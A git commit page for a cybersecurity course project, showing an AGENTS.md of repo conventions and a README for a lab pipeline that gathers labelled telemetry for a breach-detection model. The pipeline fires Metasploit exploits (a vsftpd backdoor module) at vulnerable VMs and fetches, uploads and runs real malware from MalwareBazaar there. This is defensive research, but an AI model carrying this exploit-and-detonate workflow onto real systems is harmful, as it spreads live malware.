Merge origin/main into Dev_REL1_043026; accept main's service files
Cherry-picks all upstream additions (fleet runner, full collector suite, shipper module, exploit driver, samples, scripts/, cis490_doctor, etc.) and resolves the two service-file conflicts by accepting main's production versions over the stubs we wrote on Day 1. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
This commit is contained in:
commit
7683b64929
71 changed files with 10477 additions and 214 deletions
202
AGENTS.md
Normal file
202
AGENTS.md
Normal file
|
|
@ -0,0 +1,202 @@
|
|||
# AGENTS.md — guidance for AI agents working on this repo
|
||||
|
||||
This project is part of the spectral lab (`http://maxgit.wg/spectral/`).
|
||||
The conventions below also apply to sibling repos (`wg-enroll`,
|
||||
`wg-pki`, `caddy`, `iptmonads`, `matrix`, `forgejo`, `vault`,
|
||||
`openclaw-deploy`).
|
||||
|
||||
---
|
||||
|
||||
## How a lab host gets to "shipping data" — the canonical bring-up
|
||||
|
||||
If you (an AI agent OR a human) are looking at a fresh lab host and
|
||||
asking "is this thing actually generating data for the central
|
||||
collector?", run this in order. **Cloning the repo by itself does
|
||||
nothing. Running launchers from a manual clone bypasses the
|
||||
systemd services that do the actual work.**
|
||||
|
||||
```sh
|
||||
# 0. (One-time, on the Pi only.) Initialize the CIS490 client CA + a
|
||||
# leaf cert for THIS lab host. Get its WG IP from `wg-enroll-admin
|
||||
# show <usb>` first.
|
||||
sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh # idempotent
|
||||
sudo /home/max/.env/wg-pki/scripts/deploy-cis490-cert.sh \
|
||||
<host_id> <wg_ip> # mints + scp's + extracts + chmods
|
||||
|
||||
# 1. (On the lab host.) Install the lab-host role. This copies the
|
||||
# repo into /opt/cis490, builds the venv, drops systemd units,
|
||||
# fetches the Alpine baseline qcow2, and builds the cidata ISO
|
||||
# with the in-guest agent embedded.
|
||||
sudo /opt/cis490/scripts/install-lab-host.sh
|
||||
# (or, if running from the manual clone:)
|
||||
# sudo ./scripts/install-lab-host.sh
|
||||
|
||||
# 2. Edit /etc/cis490/lab-host.toml — set host_id and any overrides.
|
||||
|
||||
# 3. Verify everything before enabling the timer-driven services:
|
||||
/opt/cis490/.venv/bin/python /opt/cis490/tools/cis490_doctor.py \
|
||||
--role lab-host
|
||||
# → green/yellow rows means READY; red rows print the exact fix
|
||||
# command. Re-run until clean.
|
||||
|
||||
# 4. Turn on the services. From this moment on, the orchestrator runs
|
||||
# one fleet wave on each Restart= cycle, and the shipper picks up
|
||||
# completed episodes and PUTs them to https://collector.wg over mTLS.
|
||||
sudo systemctl enable --now cis490-shipper cis490-orchestrator
|
||||
|
||||
# 5. (On the Pi.) Watch the index grow:
|
||||
sudo tail -f /var/lib/cis490/index.jsonl
|
||||
|
||||
# 6. (Optional, Tier 3.) Enable real exploit fire — needs metasploit.
|
||||
sudo /opt/cis490/scripts/install-msfrpcd.sh
|
||||
# Operator-supplied URL + sha256 (Rapid7 download is registration-walled):
|
||||
IMAGE_URL='…' IMAGE_SHA256='…' sudo OUT_DIR=/var/lib/cis490/vm/images \
|
||||
/opt/cis490/scripts/fetch-metasploitable2.sh
|
||||
```
|
||||
|
||||
If `index.jsonl` doesn't grow within a wave-interval (~60 s after
|
||||
`systemctl enable --now`), run `cis490-doctor` again. The most
|
||||
common silent failures it catches:
|
||||
|
||||
- `*.wg` DNS missing (wg-enroll provisions it; manual workaround is
|
||||
one line in `/etc/hosts`)
|
||||
- mTLS cert chain not installed under `/etc/cis490/certs/`
|
||||
- `cis490-shipper` service inactive (forgot step 4)
|
||||
- `qemu-system-x86_64` not on PATH
|
||||
|
||||
`cis490-doctor --json` is machine-readable for use by other agents.
|
||||
|
||||
## How an agent generates data on demand (without waiting for the timer)
|
||||
|
||||
```sh
|
||||
# One labeled episode (90 s) with a chosen sample profile:
|
||||
sudo -u cis490 /opt/cis490/.venv/bin/python \
|
||||
/opt/cis490/tools/run_real_vm_demo.py \
|
||||
--data-root /var/lib/cis490/data \
|
||||
--sample mirai-class-bot
|
||||
|
||||
# Force the shipper to run one pass:
|
||||
sudo systemctl start cis490-shipper.service # (if disabled)
|
||||
# or:
|
||||
sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
|
||||
--config /etc/cis490/lab-host.toml --once
|
||||
|
||||
# Confirm on the Pi:
|
||||
ssh <pi> 'sudo tail -3 /var/lib/cis490/index.jsonl'
|
||||
```
|
||||
|
||||
Any tool that wants to *count* what's been shipped:
|
||||
|
||||
```sh
|
||||
ssh <pi> 'sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/index_reader.py \
|
||||
--index /var/lib/cis490/index.jsonl --count-by host_id'
|
||||
```
|
||||
|
||||
## Quick test for "is the pipe alive at all"
|
||||
|
||||
The `--ping` mode of the shipper does an authenticated POST to
|
||||
`/v1/ping` and writes nothing to the database. Use it as the
|
||||
smallest E2E test:
|
||||
|
||||
```sh
|
||||
sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
|
||||
--config /etc/cis490/lab-host.toml --ping
|
||||
# {"ok": true, "status_code": 200, ...} on success.
|
||||
# Any other status is the operator's signal to read the error string.
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## File an issue when you hit a problem
|
||||
|
||||
**When you run into an issue you cannot fully resolve in the current
|
||||
turn, file it as a Forgejo issue on the relevant repo before moving
|
||||
on.** Do not silently log a TODO comment, leave a partial workaround,
|
||||
or assume someone else will remember. The issue tracker is the
|
||||
durable record.
|
||||
|
||||
This applies to:
|
||||
|
||||
- a build / test / typecheck failure you can't fix in scope
|
||||
- a bug you discover but aren't tasked with fixing
|
||||
- a missing dep, missing config, or env-only failure that blocks E2E
|
||||
- a design gap you've worked around but want a follow-up to fix
|
||||
properly
|
||||
- a scope-out you made (e.g. "deferred Tier 4 sample fetch") that
|
||||
needs an owner so it doesn't get lost
|
||||
|
||||
Don't file an issue when:
|
||||
|
||||
- the user is in the conversation and you can just *tell* them
|
||||
- it's already filed (search first: `GET /api/v1/repos/<owner>/<repo>/issues?state=open&q=<keyword>`)
|
||||
- it's truly a non-issue (a one-line edit you're about to make this
|
||||
same turn)
|
||||
|
||||
## How to file (Forgejo API)
|
||||
|
||||
The local Forgejo at `http://10.100.0.1:3000` accepts API calls with a
|
||||
token-bearer header:
|
||||
|
||||
```sh
|
||||
curl -s -X POST \
|
||||
-H "Authorization: token <TOKEN>" \
|
||||
-H "Content-Type: application/json" \
|
||||
http://10.100.0.1:3000/api/v1/repos/spectral/<repo>/issues \
|
||||
-d '{
|
||||
"title": "<short, action-oriented title>",
|
||||
"body": "<context, repro, attempted fixes, suggested next step>"
|
||||
}'
|
||||
```
|
||||
|
||||
The token comes from the user's session — never embed one in code or
|
||||
commits.
|
||||
|
||||
### What a good issue body contains
|
||||
|
||||
1. **Context** — one sentence on what was being attempted.
|
||||
2. **What happened** — the actual error, log line, or unexpected
|
||||
behavior. Paste exact output.
|
||||
3. **What was tried** — every workaround you attempted and why it
|
||||
didn't stick.
|
||||
4. **Suggested next step** — the smallest change that would resolve
|
||||
it, if you have a guess. "Unknown" is a fine answer.
|
||||
5. **Related** — link the commit / PR / file:line where the issue
|
||||
surfaced.
|
||||
|
||||
### What a good title looks like
|
||||
|
||||
| Bad | Good |
|
||||
|---|---|
|
||||
| `tests broken` | `tests/test_episode.py: race when t_mono_origin_ns is set in run() not __init__` |
|
||||
| `caddy thing` | `Caddy: client_auth requires absolute path; relative trusted_ca_cert_file silently fails` |
|
||||
| `fix later` | `shipper: 5xx backoff cap is 5min, doc says 1min — pick one` |
|
||||
|
||||
## After filing
|
||||
|
||||
- Reference the issue number in the next commit message:
|
||||
`Refs spectral/<repo>#<n>` or `Closes spectral/<repo>#<n>` if your
|
||||
current change actually fixes it.
|
||||
- If the issue is on a different repo than the one you're committing
|
||||
to, fully qualify: `spectral/wg-pki#3`.
|
||||
|
||||
## Other conventions
|
||||
|
||||
- **Don't put off the hard parts.** Frame "deferred-with-reason" only
|
||||
for genuine blockers (binary not present on this machine, external
|
||||
service unreachable). For anything you *could* do but find awkward
|
||||
— bridge setup, cross-arch quirks, fleet concurrency — do it. The
|
||||
user has flagged this twice when work was scoped down prematurely.
|
||||
When something genuinely is blocked by an operator artifact, file
|
||||
the Forgejo issue and *automate the bring-up* (e.g., installer
|
||||
script + sha256-verifying fetcher) so the moment the artifact lands
|
||||
it Just Works.
|
||||
- **Naming:** never coin USB / device / service names on the user's
|
||||
behalf. Ask first. Reusing an old name is especially bad.
|
||||
- **`/etc` configs:** `Read` first, copy second. Never overwrite a
|
||||
`/etc/...` file from a template without checking what's actually
|
||||
there.
|
||||
- **wg-enroll scope:** creation-only. Don't add admin /
|
||||
service-activation features to it.
|
||||
- **Don't expand a project's binary name beyond its own boundary:**
|
||||
`openclaw` is the queue/permissions binary in `openclaw-deploy`.
|
||||
This repo is `wg-enroll` (or its caller). Don't conflate.
|
||||
307
README.md
307
README.md
|
|
@ -4,9 +4,16 @@ Course project for CIS490 (Cybersecurity). The end-goal is an ML model that
|
|||
watches performance metrics on a real device, decides whether the device has
|
||||
been breached, and triggers a hardware-level reset when confidence is high
|
||||
enough. This repository covers the **dataset side** — we run public malware
|
||||
samples against intentionally vulnerable Linux VMs and capture labeled
|
||||
time-series telemetry that mirrors what the deployed model would see in the
|
||||
field.
|
||||
samples (and behavior-matched mimics) against intentionally vulnerable Linux
|
||||
VMs and capture labeled time-series telemetry that mirrors what the deployed
|
||||
model would see in the field.
|
||||
|
||||
Concretely, every lab host on the WireGuard mesh detects how much capacity
|
||||
it has, spins up that many concurrent VMs, gives each VM a *different*
|
||||
malware profile from the manifest, and ships the resulting labeled episode
|
||||
tarballs to the central receiver on the Pi over mTLS. Running the same
|
||||
fleet on multiple hosts gives novel, non-overlapping data per host with no
|
||||
coordinator — see [Multi-host fleet](#multi-host-fleet) below.
|
||||
|
||||
The work is grounded in the trust-over-time scoring model from
|
||||
[IEEE 9881803](https://ieeexplore.ieee.org/document/9881803).
|
||||
|
|
@ -22,15 +29,33 @@ the set of timestamped phase transitions written to `labels.jsonl` —
|
|||
sharing a monotonic clock with the metric rows so anything aligned in
|
||||
time can be aligned in code.
|
||||
|
||||
### Tier 2 — *real Alpine VM, real workload driven from inside the guest*
|
||||
### Tier 2 — *real Alpine VM, profile-driven workload inside the guest*
|
||||
|
||||
This is the closest we get to real-malware behaviour without yet running
|
||||
real malware. Telemetry is real `/proc/<qemu_pid>` from outside the
|
||||
guest, **and the load is generated inside the guest** by busybox
|
||||
``yes`` (CPU saturation) and ``dd`` (disk bursts), driven over the
|
||||
serial console by `tools/vm_load_controller.py`. Every phase transition
|
||||
in `labels.jsonl` corresponds to an actual command issued inside the
|
||||
real VM.
|
||||
guest plus three more sources running concurrently (QMP, bridge pcap,
|
||||
in-guest agent — see *Telemetry sources* below). The *load* itself is
|
||||
generated inside the guest by a profile-matched shell command from
|
||||
[`exploits/workloads.py`](exploits/workloads.py), driven over the
|
||||
serial console by [`tools/vm_load_controller.py`](tools/vm_load_controller.py).
|
||||
|
||||
Each sample's `profile` (from [`samples/manifest.toml`](samples/manifest.toml))
|
||||
dispatches to a different in-session workload, so the envelope each
|
||||
VM produces is observably different per family — exactly the variance
|
||||
the ML model needs to learn:
|
||||
|
||||
| profile | shape |
|
||||
|------------------|--------------------------------------------------------|
|
||||
| `cpu-saturate` | sustained 1-vCPU saturation (XMRig) |
|
||||
| `scan-and-dial` | SYN-style probes across the bridge subnet + dial-home |
|
||||
| `io-walk` | fs traversal + 4 KiB urandom writes (ransomware) |
|
||||
| `bursty-c2` | long idle + periodic 3-packet egress burst (Dridex) |
|
||||
| `low-and-slow` | minimal CPU + periodic memory churn (Kovter / fileless)|
|
||||
| `shell-resident` | one long-lived TCP socket + periodic command ticks (RAT)|
|
||||
|
||||
Every phase transition in `labels.jsonl` corresponds to an actual
|
||||
command issued inside the real VM, and `meta.json` records which
|
||||
sample / profile / kind drove it.
|
||||
|
||||

|
||||
|
||||
|
|
@ -41,10 +66,20 @@ controller killing the load process inside the VM. The
|
|||
infected_running → dormant → infected_running re-entry is the textbook
|
||||
envelope that justifies the whole project framing.
|
||||
|
||||
Reproduce with:
|
||||
Reproduce one episode (profile-driven via `--sample` or `SAMPLE_NAME`
|
||||
env, defaults to the v1 yes-loop without one):
|
||||
|
||||
```sh
|
||||
uv run python tools/run_real_vm_demo.py --data-root data
|
||||
uv run python tools/run_real_vm_demo.py --data-root data \
|
||||
--sample xmrig-cryptominer
|
||||
```
|
||||
|
||||
Or run the **fleet** — one wave of `max_concurrent` parallel episodes,
|
||||
each slot pulling a different sample from the manifest:
|
||||
|
||||
```sh
|
||||
uv run python tools/run_fleet.py --capacity # see what the host can do
|
||||
uv run python tools/run_fleet.py --waves 1 --data-root data
|
||||
```
|
||||
|
||||
### Tier 1 — *real Alpine VM, idle baseline*
|
||||
|
|
@ -67,14 +102,68 @@ above produces from real KVM behaviour.
|
|||
|
||||

|
||||
|
||||
### What's still missing for the real-malware envelope
|
||||
### Tier 3 — *real exploit fire, profile-matched workload (Driver v2)*
|
||||
|
||||
The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny
|
||||
msgpack-over-HTTPS msfrpc client + `MSFExploitDriver`. With a
|
||||
[`Sample`](samples/manifest.py) supplied, the driver dispatches the
|
||||
post-exploit `infected_running` workload through
|
||||
[`exploits/workloads.py`](exploits/workloads.py) — same six profiles
|
||||
as Tier 2, so a fleet wave produces matched envelopes whether or not
|
||||
an exploit fires. Without a sample, the v1 yes-loop path is preserved
|
||||
for smoke runs.
|
||||
|
||||
First canned module: `exploits/modules/vsftpd_234_backdoor.toml`
|
||||
(Metasploitable2's CVE-2011-2523). [`scripts/install-msfrpcd.sh`](scripts/install-msfrpcd.sh)
|
||||
sets up `msfrpcd` (loopback only) as a hardened systemd unit;
|
||||
[`scripts/fetch-metasploitable2.sh`](scripts/fetch-metasploitable2.sh)
|
||||
pulls + sha256-verifies a target image from operator-supplied URL.
|
||||
|
||||
### Tier 4 — *real malware sample, fetched + uploaded + executed*
|
||||
|
||||
A manifest entry with a `sha256` flips its `Sample.kind` to `"real"`.
|
||||
The driver then bypasses the mimic profile and runs the real-binary
|
||||
path:
|
||||
|
||||
1. [`tools/fetch_sample.py <sha256>`](tools/fetch_sample.py) pulls the
|
||||
binary from MalwareBazaar (Auth-Key from
|
||||
`samples/.bazaar.token` or `MALWAREBAZAAR_API_KEY`), unzips with the
|
||||
standard `infected` password, sha-verifies, and lands at
|
||||
`samples/store/<sha256>` (gitignored).
|
||||
2. At `infected_running`, the driver chunked-uploads the binary into
|
||||
the shell session as 8 KiB base64 segments
|
||||
(`exploits.workloads.chunked_real_binary_upload`). 256 KiB binaries
|
||||
work without buffer-busting msfrpc.
|
||||
3. The session decodes, sha-verifies *again on the guest side*, chmods,
|
||||
and execs only if the hash matches. Mismatch fail-stops the run.
|
||||
4. `meta.sample.sha256` + per-step events
|
||||
(`real_binary_upload_begin`, `real_binary_verify`,
|
||||
`sample_executed{kind=real}`) record exactly which binary was run
|
||||
and when, so trainers can join cleanly.
|
||||
|
||||
### Tier maturity
|
||||
|
||||
| Tier | What it gives | Status |
|
||||
|---|---|---|
|
||||
| 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done |
|
||||
| 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done |
|
||||
| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 |
|
||||
| 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 |
|
||||
| 1 — real VM, idle | confidence the collectors read real KVM behaviour | ✅ done |
|
||||
| 2 — real VM, profile-driven workload | distinguishable in-guest envelopes per malware family | ✅ done |
|
||||
| 3 — real VM, real exploit fire + profile workload | honest `armed → infecting` transitions, driver v2 dispatch | ✅ code; ⏳ awaiting Metasploitable2 image + msfrpcd on a lab host |
|
||||
| 4 — real VM, real malware sample (MalwareBazaar fetch) | the full envelope we ultimately train on | ✅ code; ⏳ awaiting MalwareBazaar API key + sha256s in manifest |
|
||||
|
||||
### Telemetry sources (all five wire into one episode dir)
|
||||
|
||||
| # | Source | Vantage | Role |
|
||||
|---|--------------------------------|---------------|---------------------|
|
||||
| 1 | host `/proc/<qemu_pid>` | outside | oracle (label only) |
|
||||
| 2 | QEMU QMP queries | outside | oracle (label only) |
|
||||
| 3 | `perf stat -p <qemu_pid>` | outside | oracle (label only) |
|
||||
| 4 | Bridge pcap → 100 ms netflow | gateway-side | feature (deployable)|
|
||||
| 5 | In-guest agent (virtio-serial) | inside | feature (deployable)|
|
||||
|
||||
All five are live. The deploy/oracle split follows
|
||||
[`docs/threat-model.md`](docs/threat-model.md): only sources 4 + 5
|
||||
are usable as model *features* in the field — sources 1, 2, 3 exist
|
||||
as labeling oracles only.
|
||||
|
||||
For an interactive view of any episode (zoom/pan/hover), run:
|
||||
|
||||
|
|
@ -85,83 +174,135 @@ tools/show_envelope.sh data/episodes/<episode_id>
|
|||
|
||||
---
|
||||
|
||||
## Status
|
||||
## Status (106/106 tests passing as of `a88ac83`)
|
||||
|
||||
- ✅ Receiver (HTTPS PUT, sha256-verified, idempotent) — tested with httpx + curl
|
||||
- ✅ Orchestrator v0 — single- and scheduled-phase modes, ULID episode ids
|
||||
- ✅ Host /proc oracle collector (source 1 of 5) at 10 Hz
|
||||
- ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end
|
||||
- ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid
|
||||
- ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition
|
||||
- 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5)
|
||||
- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open`
|
||||
- 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified)
|
||||
**Pipeline (lab-host → Pi → tarball stored)**
|
||||
- ✅ Receiver app (HTTPS PUT, sha256-verified, idempotent) — running on the Pi behind Caddy with mTLS via the wg-pki client CA
|
||||
- ✅ `POST /v1/ping` smoke endpoint (writes nothing, exercises the full auth path)
|
||||
- ✅ Shipper (`shipper/`) — tar+zstd, retry/backoff, `--ping` mode
|
||||
- ✅ Caddy `collector.wg` block (in `spectral/caddy`)
|
||||
- ✅ Lab-host install script + systemd units (`scripts/install-lab-host.sh`, `etc/cis490-{shipper,orchestrator}.service`)
|
||||
- ✅ Receiver install script (`scripts/install-receiver.sh`)
|
||||
- ✅ wg-pki client-CA bootstrap + per-host leaf issuance (in `spectral/wg-pki`)
|
||||
|
||||
> **Topology note:** in this project the **Pi5 is the WireGuard-side
|
||||
> *collector*** that receives episode tarballs from one or more lab hosts.
|
||||
> It is *not* the deployment target for the model. The deployment target is
|
||||
> generic ("any constrained Linux device"). See
|
||||
**Telemetry**
|
||||
- ✅ Source 1 — host `/proc/<qemu_pid>` @ 10 Hz
|
||||
- ✅ Source 2 — QEMU QMP @ 1 Hz
|
||||
- ✅ Source 3 — `perf stat -p <qemu_pid>` (opt-in via `enable_perf`; needs `CAP_SYS_ADMIN` / `CAP_PERFMON`)
|
||||
- ✅ Source 4 — bridge pcap + 100 ms netflow bucketizer (pure-Python parser, no scapy/dpkt dep), wired into `EpisodeRunner` via `bridge_iface`
|
||||
- ✅ Source 5 — in-guest agent over virtio-serial; cidata-embedded for first-boot install on Alpine
|
||||
|
||||
**Orchestrator + drivers**
|
||||
- ✅ Orchestrator v0 — phase-scheduled episode runner, ULID episode ids
|
||||
- ✅ Snapshot/revert via QMP `loadvm` (`revert_at_start` / `revert_at_end`) for clean baselines between episodes
|
||||
- ✅ Tier 2 driver — real Alpine VM, profile-driven in-guest workload over serial console
|
||||
- ✅ Tier 3 driver v2 — `MSFExploitDriver` + msfrpc client + per-sample workload dispatch; first canned module `vsftpd_234_backdoor.toml`
|
||||
- ✅ Tier 4 — `tools/fetch_sample.py` (MalwareBazaar by sha256) + chunked real-binary upload (`exploits.workloads.chunked_real_binary_upload`) + guest-side sha-verify-then-exec dispatch in `MSFExploitDriver`
|
||||
- ⏳ Tier 3 integration — needs operator to drop a Metasploitable2 image + run `scripts/install-msfrpcd.sh` on a lab host
|
||||
- ⏳ Tier 4 integration — needs operator's MalwareBazaar API key + at least one `sha256` entry in `samples/manifest.toml`
|
||||
|
||||
**Fleet (multi-VM, multi-host data generation)**
|
||||
- ✅ Resource-aware capacity detector (cores / RAM / load) — `orchestrator/fleet.py`
|
||||
- ✅ Concurrent slot runner — `tools/run_fleet.py`
|
||||
- ✅ Sample manifest with six behavioural profiles + deterministic per-(host_id, slot, episode) selection so every host walks the catalog in a different order
|
||||
|
||||
> **Topology note:** the **Pi5 is the WireGuard-side *collector*** that
|
||||
> receives episode tarballs from one or more lab hosts. It is *not* the
|
||||
> deployment target for the model. The deployment target is generic
|
||||
> ("any constrained Linux device"). See
|
||||
> [`docs/architecture.md`](docs/architecture.md).
|
||||
|
||||
---
|
||||
|
||||
<details>
|
||||
<summary><b>Quick start — run the synthetic envelope demo (~90 s)</b></summary>
|
||||
<summary><b>Quick start — fleet mode (the primary workflow)</b></summary>
|
||||
|
||||
```sh
|
||||
git clone https://maxgit.wg/spectral/CIS490.git
|
||||
cd CIS490
|
||||
|
||||
# One-time setup.
|
||||
uv sync
|
||||
|
||||
# Generate one labeled episode (8 phases, 851 telemetry rows, 85 s).
|
||||
uv run python tools/run_envelope_demo.py --data-root data
|
||||
# 1. Build the cidata ISO with the in-guest agent baked in.
|
||||
uv run python tools/build_cidata.py vm/images/cidata.iso
|
||||
|
||||
# Render a static PNG envelope of that episode.
|
||||
uv run python tools/plot_envelope.py data/episodes/<episode_id>
|
||||
# 2. See what this host is sized for.
|
||||
uv run python tools/run_fleet.py --capacity
|
||||
# cores: 4 (reserve 1)
|
||||
# ram: 7951 MiB total, 5223 MiB available (headroom 1024 MiB, per-vm 320 MiB)
|
||||
# load: 1m=0.51
|
||||
# caps: by_cores=3, by_ram=13, by_load=3
|
||||
# --> max_concurrent VMs: 3
|
||||
|
||||
# Or open an interactive plot in your browser:
|
||||
# 3. Run one wave (= max_concurrent parallel episodes, each with a
|
||||
# different sample profile).
|
||||
uv run python tools/run_fleet.py --waves 1 --data-root data
|
||||
|
||||
# 4. Plot any episode (matplotlib WebAgg).
|
||||
tools/show_envelope.sh data/episodes/<episode_id>
|
||||
```
|
||||
|
||||
The data lands in `data/episodes/<ulid>/`:
|
||||
Each episode dir contains:
|
||||
|
||||
```
|
||||
meta.json episode metadata (image, snapshot, schedule, host fingerprint)
|
||||
events.jsonl orchestrator actions (snapshot_load, phase_transition, episode_end)
|
||||
meta.json episode metadata (image, sample, profile, fleet capacity)
|
||||
events.jsonl orchestrator + driver events (exploit_fire, session_open, sample_executed, ...)
|
||||
labels.jsonl one row per phase transition — THIS is the envelope
|
||||
telemetry-proc.jsonl host /proc sampler at 10 Hz
|
||||
telemetry-proc.jsonl source 1: host /proc sampler @ 10 Hz
|
||||
telemetry-qmp.jsonl source 2: QMP query-status / blockstats / kvm stats @ 1 Hz
|
||||
telemetry-guest.jsonl source 5: in-guest agent (CPU jiffies, mem, listen ports, top procs)
|
||||
network.pcap source 4: tcpdump on br-malware
|
||||
netflow.jsonl source 4: 100 ms-bucketed pcap aggregation
|
||||
done.marker written last; the shipper only sees finished episodes
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><b>Quick start — boot a real Linux VM (Cirros)</b></summary>
|
||||
|
||||
The phase-2 launcher boots a Cirros qcow2 under KVM and exposes its
|
||||
QMP/monitor sockets and pidfile. The orchestrator then samples the real
|
||||
`qemu-system` process.
|
||||
<summary><b>Quick start — single episode, no fleet</b></summary>
|
||||
|
||||
```sh
|
||||
# Pre-staged: vm/images/cirros-baseline.qcow2 with snapshot 'baseline-v1'.
|
||||
# (See docs/sources.md for the Cirros sha256.)
|
||||
# Tier 2 (no exploit, profile-driven workload):
|
||||
uv run python tools/run_real_vm_demo.py --data-root data \
|
||||
--sample mirai-class-bot
|
||||
|
||||
# Boot in one terminal:
|
||||
RUN_DIR=/tmp/cis490-vm vm/launch_demo.sh
|
||||
|
||||
# In another terminal, point the orchestrator at the VM's pid:
|
||||
QPID=$(cat /tmp/cis490-vm/qemu.pid)
|
||||
uv run python -m orchestrator --target-pid $QPID --duration 20
|
||||
|
||||
# Plot:
|
||||
tools/show_envelope.sh data/episodes/<episode_id>
|
||||
# Tier 3 (real exploit fire via msfrpcd):
|
||||
MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env; echo $MSFRPC_PASSWORD) \
|
||||
uv run python tools/run_tier3_demo.py \
|
||||
--module vsftpd_234_backdoor \
|
||||
--sample ransomware-mimic \
|
||||
--data-root data
|
||||
```
|
||||
|
||||
The idle-VM envelope shape is distinct from the synthetic load: periodic
|
||||
~10% CPU spikes from KVM/timer interrupts, flat ~230 MiB RSS, a single
|
||||
late-boot disk write. That's a real KVM guest you're seeing.
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><b>Multi-host fleet — how cross-host diversity works</b></summary>
|
||||
|
||||
Each lab host's `host_id` (set in `/etc/cis490/lab-host.toml`) seeds a
|
||||
deterministic walk through the sample catalog:
|
||||
|
||||
```python
|
||||
# samples/manifest.py
|
||||
def select(self, *, host_id, slot, episode_index):
|
||||
seed = f"{host_id}|{slot}|{episode_index}"
|
||||
idx = sha256(seed)[:8] % len(self.samples)
|
||||
return self.samples[idx]
|
||||
```
|
||||
|
||||
So:
|
||||
- `host=alice slot=0 ep=0` and `host=bob slot=0 ep=0` almost certainly
|
||||
pick *different* samples (test asserts < 25% collision over 20 trials).
|
||||
- A single host walks the entire catalog within ~`len(manifest)` waves
|
||||
(test confirms full coverage in 200 episodes).
|
||||
- No coordinator needed — every host independently produces non-overlapping
|
||||
data, and `meta.fleet.host_id` + `meta.sample.name` make the join trivial
|
||||
at training time.
|
||||
|
||||
The fleet runner shells out to the same `tools/run_real_vm_demo.py` per
|
||||
slot, with `SLOT` / `RUN_DIR` / `SAMPLE_NAME` env passed through to the
|
||||
launcher. Each VM gets its own QMP socket, agent socket, hostfwd port
|
||||
range, and episode dir, so concurrency is collision-free up to the
|
||||
capacity ceiling.
|
||||
|
||||
</details>
|
||||
|
||||
|
|
@ -177,15 +318,18 @@ late-boot disk write. That's a real KVM guest you're seeing.
|
|||
| [`docs/deploy.md`](docs/deploy.md) | One-command install for the lab-host and receiver roles |
|
||||
| [`docs/lab-setup.md`](docs/lab-setup.md) | KVM prereqs, VM build, snapshot, virtio-serial wiring |
|
||||
| [`docs/sources.md`](docs/sources.md) | Works cited — every tool, dep, sample source, paper, and standard |
|
||||
| `orchestrator/` | State machine that drives the boot → arm → detonate → observe → revert loop |
|
||||
| `collectors/` | One module per telemetry source (host /proc, QMP, perf, pcap, guest agent) |
|
||||
| `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent |
|
||||
| `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) |
|
||||
| `tools/` | Demo runners, load mimic, plot scripts |
|
||||
| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) |
|
||||
| `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** |
|
||||
| `orchestrator/` | Episode runner + `fleet.py` (capacity detection, concurrent slot driver) |
|
||||
| `collectors/` | One module per telemetry source: `proc_qemu`, `qmp`, `pcap`, `guest_agent` |
|
||||
| `receiver/` | Starlette app: PUT `/v1/episodes` + POST `/v1/ping`, sha256-verified, idempotent |
|
||||
| `shipper/` | Lab-host-side: scan `data/episodes/`, tar+zstd, PUT over mTLS, retry/backoff |
|
||||
| `vm/` | Launch scripts (`launch_demo.sh`, `launch_target.sh`), `setup_bridge.sh`, in-guest agent at `vm/guest-agent/cis490_agent.py`. qcow2 images and pcap captures gitignored. |
|
||||
| `tools/` | `run_fleet.py`, `run_real_vm_demo.py`, `run_tier3_demo.py`, `build_cidata.py`, `plot_envelope.py`, `show_envelope.sh` |
|
||||
| [`exploits/`](exploits/README.md) | MSF RPC client (`msfrpc.py`), `driver.py` (v2 with sample dispatch), `workloads.py` (six profile-matched in-session loops), per-module TOML configs |
|
||||
| [`samples/`](samples/manifest.toml) | Sample manifest + loader. Binaries land at `samples/store/<sha256>` (gitignored). |
|
||||
| `scripts/` | `install-{lab-host,receiver,msfrpcd}.sh`, `fetch-metasploitable2.sh` |
|
||||
| `training/` | Model training code (deferred — schema first) |
|
||||
| `etc/` | systemd units and config templates installed by the deploy scripts |
|
||||
| `etc/` | systemd units and config templates (`cis490-{receiver,shipper,orchestrator}.service`, `lab-host.toml.example`, `receiver.toml.example`) |
|
||||
| [`AGENTS.md`](AGENTS.md) | Conventions for AI agents working on this and sibling spectral repos |
|
||||
|
||||
</details>
|
||||
|
||||
|
|
@ -226,17 +370,26 @@ Two roles, one bootstrap command each. Detailed in
|
|||
`index.jsonl`. Runs on the Pi5 in our setup.
|
||||
|
||||
```sh
|
||||
# On a lab host:
|
||||
./scripts/install-lab-host.sh # (TODO — currently bring up by hand per docs/deploy.md)
|
||||
|
||||
# On the Pi5 (or any always-on WG node):
|
||||
./scripts/install-receiver.sh # (TODO — same)
|
||||
sudo ./scripts/install-receiver.sh
|
||||
# Add the collector.wg block to spectral/caddy (already merged), then:
|
||||
sudo systemctl enable --now cis490-receiver
|
||||
|
||||
# One-time, on the Pi: bootstrap the CIS490 client CA.
|
||||
sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh
|
||||
|
||||
# On each lab host: enroll via wg-enroll first, then:
|
||||
sudo ./scripts/install-lab-host.sh
|
||||
